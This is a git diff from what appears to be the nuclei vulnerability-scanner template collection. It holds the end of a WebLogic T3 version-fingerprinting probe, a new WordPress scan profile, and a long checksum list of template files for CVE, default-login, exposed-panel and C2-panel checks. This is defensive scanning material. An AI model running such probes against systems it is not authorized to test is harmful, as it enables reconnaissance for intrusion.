- data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
host:
- "tls://{{Hostname}}"
read-size: 1024
port: 7002
matchers:
- type: word
words:
@ -63,4 +50,4 @@ tcp:
group: 1
regex:
- "HELO:(.*).false"
# digest: 4b0a004830460221008e4fc5512e10a4bac580826b8cb65a981a9ef61b55f63c6f892cf0dde4b500a8022100e08f41e4f5d99713ff8e920b11a1fdfa70f7b1f5f5d0a2df25aa91bf69a010df:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100facd45545006bc9f15dfbf5927e636142e1983912edf41f16247c32732bde2570220480584b7a2efa59dd5d643adefc5cb750e10c155f054ca2bcde4de68a97cbd64:922c64590222798bb761d5b6d8e72950

9
profiles/wordpress.yml Normal file

@ -0,0 +1,9 @@
# This is a configuration file for the wordpress template profile.
# Additional configuration profiles can be created for different types of nuclei scans.
# They should be placed under the 'profiles' directory at:
# https://github.com/projectdiscovery/nuclei-templates
# Here is an example of how to use a profiles profile:
# nuclei -config profiles/wordpress.yml -list target_list_to_scan.txt
tags:
- wordpress


@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593
CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71
LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df
PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7
README.md:70736c6faaf92554e4711d1ccdb709abe1ccfb0d
README.md:6c60460e1b0f948b5ee382edcedf044ba5aff856
README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26
TEMPLATES-STATS.json:dd9a2992caeffaa53bbda5f3166a5f2df1dc3210
TEMPLATES-STATS.md:47130017e50921075ff79d152501d5e3ac88eb0b
TOP-10.md:19dc2fecaf3933fe8c0c250b8c2ebfa0fa89854c
TEMPLATES-STATS.json:f43402ca0284acc690f4d239afd477488d220182
TEMPLATES-STATS.md:7d758b52f7d1c73e19018bddb902f0076bd4a867
TOP-10.md:3e73524df2b18729f1e3def717dac5e973708c14
cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f
cloud/aws/acm/acm-cert-renewal-30days.yaml:a90f78e355c103211f113d112ced769e7a0297a2
cloud/aws/acm/acm-cert-renewal-45days.yaml:31dd523c386a3e2fce9e6882f0bd6eadcb5d9527
@ -19,7 +19,7 @@ cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:71aafc94886bc0bf1ad799a59043ccb14c
cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:0fdecbb14773ede92defb5550f8b6f280675ae77
cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:4e6f15779999587b4ebbcf8b0ddc523155decb48
cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:2493c4d57eef3d147cf93ffd7a492cfc409f1426
cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:8c6cf3eeb8314189731e7c5925fb8f3b9057f278
cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:4f082a6a5aed38fdbf01a3194fbaffc4cd799a8a
cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:ca1a07dc81a0071d64ab7a4d9868367d1c7465ea
cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:c5c333bcd31a6282a913a9cfe7a440566ed1bb78
cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:4fd566c83837e16dbc3b4db04b840b0abcba2804
@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
cves.json:0820bc134ca52d7071cc8c6596b3ac37a095a0ae
cves.json-checksum.txt:996eafaef74b06977788950a04aeebf48b096611
cves.json:5cc15bbdbdf77cdc98f62333d1674a451ef23c76
cves.json-checksum.txt:eaeeca8d28a10d9264e42d57757cbb121db0aada
dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22
dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
@ -201,7 +201,7 @@ dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28
dast/vulnerabilities/lfi/lfi-keyed.yaml:366e7b0c3bdef023427815022e64ed88b6e1d3d5
dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:71bfad9f7132086665db55b8c5aeeee3adf23d89
dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:f3663bb5ab092b4fc1e69998c2d92d64312dc57f
dast/vulnerabilities/redirect/open-redirect.yaml:0e16729d72a4b492267144a21d378c118dd38195
dast/vulnerabilities/redirect/open-redirect.yaml:fe71f239a2fa403c11e86a54ec0f5685020f43bf
dast/vulnerabilities/rfi/generic-rfi.yaml:ac4f9582d4d9b7930d28dbc0f21eede8df760507
dast/vulnerabilities/sqli/sqli-error-based.yaml:ab3efe10b425fed28b569a88fd149d7e7ac706df
dast/vulnerabilities/ssrf/blind-ssrf.yaml:83027f4642aeaf84e49f09fc876ff91d6002f3af
@ -210,14 +210,14 @@ dast/vulnerabilities/ssti/reflection-ssti.yaml:f88426f514ecbe514a5b988b2e826d967
dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253
dast/vulnerabilities/xss/reflected-xss.yaml:1faff32e9ad4bb73f0476c526f9b6ef6d5a51757
dast/vulnerabilities/xxe/generic-xxe.yaml:54b04c0c3b8d50d6305ed48ac7997f1aeeea426d
dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a
dns/bimi-detect.yaml:49b1f8b7289261ba3926483a41fa213f921248f2
dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37
dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6
dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e
dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c
dns/dns-waf-detect.yaml:305812728bc0395016f22f5b4c04f634a9fb4ad4
dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592
dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644
dns/elasticbeanstalk-takeover.yaml:d6be1fd0a3ee4d72149e942bcf77b93c175c1588
@ -547,7 +547,7 @@ file/malware/vertex-malware.yaml:dbbbe626d020ae4d7bbd344de80b6a54835ec6b5
file/malware/virusrat-malware.yaml:26139365e8bc1b4ca2b45a9490c34b19f986215e
file/malware/wabot-malware.yaml:7d2630471fae89dc585a6cbd284f9bf29e6259d7
file/malware/wannacry-malware.yaml:4d955739e936b2e11fa054b66bb3bcae8b924b49
file/malware/warp-malware.yaml:9c5955f1a0da020828e0294bcdd0ffae3ed6c6e2
file/malware/warp-malware.yaml:9c9807f855164bb0900194f0ed48bd194d310ea5
file/malware/xhide-malware.yaml:1014bac698098d85b1de13cce518523719c41021
file/malware/xor-ddos-malware.yaml:f5b4f72a7b0ed38d9d6010429fe0bb69181383ce
file/malware/yayih-malware.yaml:d0632e660caa87b47d08a264fd0625d587900dc8
@ -841,6 +841,7 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e
helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875
helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6
http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2
http/cnvd/2017/CNVD-2017-06001.yaml:5ac8e22a95722f256b2676eb6bb0dfff30ee70c9
http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb
http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9
http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6
@ -1116,7 +1117,7 @@ http/cves/2014/CVE-2014-2383.yaml:60182a283fc602cd74b0652577d114cc921837a7
http/cves/2014/CVE-2014-2908.yaml:ba4bad2d7e97fd75e9cb049b5bc2175e4e274b8c
http/cves/2014/CVE-2014-2962.yaml:bda481d04555d454bbc3ecced9906fcaf12801c7
http/cves/2014/CVE-2014-3120.yaml:3cf0983b299bbdf24b5f1ed3693a8cb0e69783ee
http/cves/2014/CVE-2014-3206.yaml:5bcd720008ba2297db841385a8f54f07215edf17
http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a
http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0
http/cves/2014/CVE-2014-3744.yaml:ef82571e3fd9947c935fb978114e323826edf9a6
http/cves/2014/CVE-2014-4210.yaml:b58d6efe179c70093be240210323d92369e1028e
@ -1170,7 +1171,7 @@ http/cves/2015/CVE-2015-2196.yaml:41c3025eda3b296fadb3afb70e9f44ab5e855a86
http/cves/2015/CVE-2015-2755.yaml:153c44d93a107d184876d575101a5e3bae6ade75
http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541
http/cves/2015/CVE-2015-2807.yaml:a32104390b45df0c648be1124edd91b81a398bd8
http/cves/2015/CVE-2015-2863.yaml:ec18b83f753cde2e1efedc78605d4609de00b044
http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f
http/cves/2015/CVE-2015-2996.yaml:4a148288d459b04645da3f50f3d5ed9f2a569fe9
http/cves/2015/CVE-2015-3035.yaml:7e9bcc2539eee69c097358692a1fb05cec8af353
http/cves/2015/CVE-2015-3224.yaml:c3fa9504f5cba20a3037356578c60c6599bf4218
@ -2348,7 +2349,7 @@ http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b
http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297
http/cves/2021/CVE-2021-42887.yaml:dfe8d47da07a7c37b5294acdd283c4c27dbdf753
http/cves/2021/CVE-2021-43062.yaml:a2a6ba5ec2ce275fa2ffbb6b19af1b20dfc0a0c3
http/cves/2021/CVE-2021-43287.yaml:86f5633bd3e4a0df1cdc3cf229d5f6c94da694d8
http/cves/2021/CVE-2021-43287.yaml:924e0ab303bf4959fb489490c4a5592747b44abe
http/cves/2021/CVE-2021-43421.yaml:d3b512996e80ab08eaec03df406c88aa78376ac9
http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92
http/cves/2021/CVE-2021-43496.yaml:1241385fad2c3dee60c598304d8dc5b177d94c32
@ -2712,7 +2713,7 @@ http/cves/2022/CVE-2022-32771.yaml:03f39391c095a08e62741ce113c743f4517b8823
http/cves/2022/CVE-2022-32772.yaml:da27806050d52e5cac3989730b256c6f4509314c
http/cves/2022/CVE-2022-33119.yaml:ff5573e49a471b38a8309236950429441246dfab
http/cves/2022/CVE-2022-33174.yaml:fdf252755679cf8edbb5d3bd76a2e3318c38b703
http/cves/2022/CVE-2022-33891.yaml:8f81f948758e19f4115f39eb1709b074d2dae3ff
http/cves/2022/CVE-2022-33891.yaml:be15239c35fe6650ca82d85b304b20132ea20b4e
http/cves/2022/CVE-2022-33901.yaml:ad281903ad2b3a9d2612e85fd9668f248e915a8b
http/cves/2022/CVE-2022-33965.yaml:3739b3179daf3df8780e204c3eb4c3b981cf15d6
http/cves/2022/CVE-2022-34045.yaml:3db1aeeb2d125c974bf12bbcfa88b3011d00093d
@ -3009,6 +3010,7 @@ http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980
http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3
http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97
http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235
http/cves/2023/CVE-2023-29827.yaml:90f368b70e029388425d8a5ce9c20f8653d6b77b
http/cves/2023/CVE-2023-29887.yaml:e113d28b0ce375d0f46f3ca21f487a256def33f8
http/cves/2023/CVE-2023-29919.yaml:b533c1f55fa3bb3f71c7236830fd870e9b1bd26e
http/cves/2023/CVE-2023-29922.yaml:7934ef556ed602ceda52383f485dab24bd6c53e5
@ -3068,6 +3070,7 @@ http/cves/2023/CVE-2023-34960.yaml:a66475a23377f21213abfe5ced7ddb1f8e3fd0fe
http/cves/2023/CVE-2023-34993.yaml:6f7c7fa7cff8cd4cd2edc84b56e54e93f4d55e22
http/cves/2023/CVE-2023-35078.yaml:8feaee8f6f5d9a212d65db4fb49a3e869d59ea2d
http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae
http/cves/2023/CVE-2023-35158.yaml:93718c34c9acb11a626e4076fe6f21953401b5a4
http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd
http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874
http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9
@ -3077,6 +3080,7 @@ http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12
http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206
http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75
http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b
http/cves/2023/CVE-2023-36347.yaml:80107e418716ca04fb08977e478af1dde95045f3
http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672
http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259
http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef
@ -3155,12 +3159,14 @@ http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65
http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56
http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6
http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d
http/cves/2023/CVE-2023-43374.yaml:cf29b56d8ba36ab18d35d83a0105cbe76841ec1f
http/cves/2023/CVE-2023-43795.yaml:a14750da396529474d303182bee73893d7f284c9
http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb
http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e
http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3
http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542
http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166
http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3
http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b
http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e
http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5
@ -3168,6 +3174,7 @@ http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2
http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf
http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e
http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686
http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964
http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb
http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1
http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96
@ -3203,6 +3210,7 @@ http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598
http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413
http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62
http/cves/2023/CVE-2023-5914.yaml:e569de3f31b3f9b4affbeac019dc42e7e4b6a0a3
http/cves/2023/CVE-2023-5991.yaml:2760a58a352d55a71ad7a177100f0513a82ed6c3
http/cves/2023/CVE-2023-6018.yaml:eb0a236252c640180f594627bfb873c35a398fd6
http/cves/2023/CVE-2023-6020.yaml:bb2f91071bd7ca0a284f7a15d68288e499f1f427
http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600
@ -3225,6 +3233,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f
http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158
http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14
http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac
http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f
http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49
http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe
http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8
@ -3240,6 +3249,7 @@ http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8
http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e
http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af
http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe
http/cves/2024/CVE-2024-1561.yaml:a134c8864733abe3278ebb6cf67a54c36b6ae29f
http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270
http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d
@ -3272,13 +3282,14 @@ http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b
http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841
http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a
http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc
http/cves/2024/CVE-2024-3097.yaml:4185bbc6b136c6f1674cf35e66d4c4142e75bb0e
http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d
http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730
http/cves/2024/CVE-2024-31848.yaml:9af993dd7348e9e7863df89ef4f77c8458ad6147
http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc
http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440
http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea
http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba
http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf
http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6
http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d
http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921
http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5
http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17
@ -3439,6 +3450,7 @@ http/default-logins/seeyon/seeyon-monitor-default-login.yaml:f4a51f27c4e839502e7
http/default-logins/sequoiadb/sequoiadb-default-login.yaml:dabe65c9eef1e73cc13c91f81ef91b44503583c4
http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3422db16dfab647a
http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2
http/default-logins/softether/softether-vpn-default-login.yaml:592f93a18fc9a97f31d8a29780dcb874e255d244
http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd
http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5
http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1
@ -3481,6 +3493,7 @@ http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cc
http/exposed-panels/acemanager-login.yaml:0197d85b74ad6a243f7722048e36b0fcd64f9862
http/exposed-panels/acenet-panel.yaml:b88e1211a38547cc9d8ee15228197eb2d9512430
http/exposed-panels/achecker-panel.yaml:5c7e9d3946502e0f479d98cb9a3ba27b2e5a9a9c
http/exposed-panels/ackee-panel.yaml:fc048c64a3be4b70abcbbdab43592287f34db03d
http/exposed-panels/acrolinx-dashboard.yaml:2238288d59b3af798ae446173975a84abb7dfcea
http/exposed-panels/acti-panel.yaml:628420846539ed0cf69e5689f49ab4e57a26a451
http/exposed-panels/active-admin-exposure.yaml:504071b3c78140c2d6866df302226fe9f7bdd733
@ -3523,7 +3536,7 @@ http/exposed-panels/amprion-gridloss-panel.yaml:73cee815a7838b9e0c4194574846022e
http/exposed-panels/anaqua-login-panel.yaml:c27171a1b8278f48ca70e0034ab68166d989b01a
http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3
http/exposed-panels/ansible-tower-exposure.yaml:2c6bfd553582685d0847df767ef90270440716b6
http/exposed-panels/apache/apache-apisix-panel.yaml:157792ae0cf09e97d18b9374f2730846491a2997
http/exposed-panels/apache/apache-apisix-panel.yaml:2ea899b548359d2406b8a4576eeca268406a122b
http/exposed-panels/apache/apache-mesos-panel.yaml:2fa694d1b3b7747c5dc1ea524a6766b4d2363585
http/exposed-panels/apache/public-tomcat-manager.yaml:c22e014c580c1ca6d14f73e0eb6420a454e50cd6
http/exposed-panels/apache-jmeter-dashboard.yaml:c1ffb3e0855225392f6559b0ffdac5ea304593ce
@ -3619,7 +3632,7 @@ http/exposed-panels/c2/pupyc2.yaml:276b410dc583d2cfd9742a040bc048997d090548
http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:8ebbc2a86c1513245e2b68fe7d9d31d56645752c
http/exposed-panels/c2/supershell-c2.yaml:9533bcc7d91683804c11dd054c172d15241e595d
http/exposed-panels/c2/viper-c2.yaml:f708e8061a27834d3811c6ddced04f88548d82cc
http/exposed-panels/cacti-panel.yaml:522433ee64137fb9e5195f26a080b5c0f3b89bc8
http/exposed-panels/cacti-panel.yaml:d8df896275c8442591f3ee3e3fb969618da78aaf
http/exposed-panels/calendarix-panel.yaml:15d8c58acf5ffa87da6baedb078709feff94b176
http/exposed-panels/call-break-cms.yaml:d37a921a0f3dd61db474c8366f58fb02308b0e4f
http/exposed-panels/camunda-login-panel.yaml:474070f6901e0b308c48903ded30985dbc033173
@ -3627,7 +3640,7 @@ http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71
http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2
http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5
http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:1decbcfd31237f785c6a156d79e8db4a25cb2d14
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:bae531af7faf23fccf9f5e1bf192fbc14ffc9969
http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8
http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56
http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023
@ -3692,6 +3705,7 @@ http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e3969
http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558
http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7
http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395
http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90
http/exposed-panels/creatio-login-panel.yaml:be251ed8449b36fffd157869473e9d02d523f573
http/exposed-panels/crontab-ui.yaml:7504a353c3dc9824fefa0aae8181f1d1432e8ed9
http/exposed-panels/crush-ftp-login.yaml:fd6d8e7854c0b21aefe3ccd2c888a28e5605a996
@ -3751,6 +3765,7 @@ http/exposed-panels/e-mobile-panel.yaml:97952c73a01ba76b8f821e110326a5b8976c077c
http/exposed-panels/eMerge-panel.yaml:128223c03da8481549810a42b35e3c8d88a478eb
http/exposed-panels/earcu-panel.yaml:7d1924978269db09ab39f7d9bb8fbc89a069ebbc
http/exposed-panels/easyjob-panel.yaml:e9d4d870309fc1b13a57009060dc9d7abd9ecef6
http/exposed-panels/easyvista-panel.yaml:a997baadb80031e6e50898c1cb0cd1bf3174902d
http/exposed-panels/eclipse-birt-panel.yaml:99ec0cc6817e95c7b3b8a7025cb949db688a9229
http/exposed-panels/ecosys-command-center.yaml:b6e297af2f5896e0dcc0a4185eb6bcc5805c1152
http/exposed-panels/edgeos-login.yaml:7021c21f36e9df66be21c539248866415245f8aa
@ -3805,6 +3820,7 @@ http/exposed-panels/footprints-panel.yaml:710811c96a4264548ac4c5a43b1185f030179d
http/exposed-panels/forcepoint-applicance.yaml:79eb429c835bf3e0a5073a95a56dc510c974010b
http/exposed-panels/forcepoint.yaml:ad7a86c55f1d8d4d160a7fd2d5f739dfff7a64cb
http/exposed-panels/forti/fortiadc-panel.yaml:c5e5b9d49eb70b71f037b1cb38495868e895bef8
http/exposed-panels/fortinet/f5-next-central-manager.yaml:88b7c61b91dcb46cb80694570e9f6dc214b91f08
http/exposed-panels/fortinet/fortiap-panel.yaml:10a66195ff6d6d49614a0cc15ad20d93cc75c823
http/exposed-panels/fortinet/fortiauthenticator-detect.yaml:6d66b0096515e57ba6be49aff722f6b7e408b1f8
http/exposed-panels/fortinet/forticlientems-panel.yaml:43090f0fc7417ee1bb80dc66bbacc277ed3ef5ff
@ -3832,6 +3848,7 @@ http/exposed-panels/genweb-plus-panel.yaml:722cb54cc9efc1b84972c6d80c994282efb8f
http/exposed-panels/geoserver-login-panel.yaml:c62e462b728c52ae197f5b0446ae908f3401a935
http/exposed-panels/gerapy-detect.yaml:724d1afda108c6a2912bcc793046063e26909b86
http/exposed-panels/gespage-panel.yaml:57eee82ad1606862ed17208b8ff03a7cdba0cb16
http/exposed-panels/ghost-panel.yaml:b756b79a07012086b84e1b3b5e946128e34f85f5
http/exposed-panels/gira-homeserver-homepage.yaml:c88f54ceb96676698f89520661b9594f644d6fc2
http/exposed-panels/git-repository-browser.yaml:5b9b836099213deb45e0d441e5cb66224cf5c8a5
http/exposed-panels/gitblit-panel.yaml:8b14a008bde650f9f125c4b930c2908aa6b95334
@ -3945,7 +3962,7 @@ http/exposed-panels/jeedom-panel.yaml:3fb84bbcfa09ce6964cb2dce502f417498bf82b4
http/exposed-panels/jellyseerr-login-panel.yaml:51a7c1b5d8b5e3f8169bbc8abd9941821477fc41
http/exposed-panels/jenkins-api-panel.yaml:0ba41d9daabab4714bcf58808cfc661c9e9310f2
http/exposed-panels/jenkins-login.yaml:89b0f8e296398a825248bd82947ca61fce3c2a7c
http/exposed-panels/jfrog-login.yaml:07f159d0ee368ce3c235933c257e7781cf687890
http/exposed-panels/jfrog-login.yaml:11757e8cca9629ff2a9ab002a2dedcf867f7692b
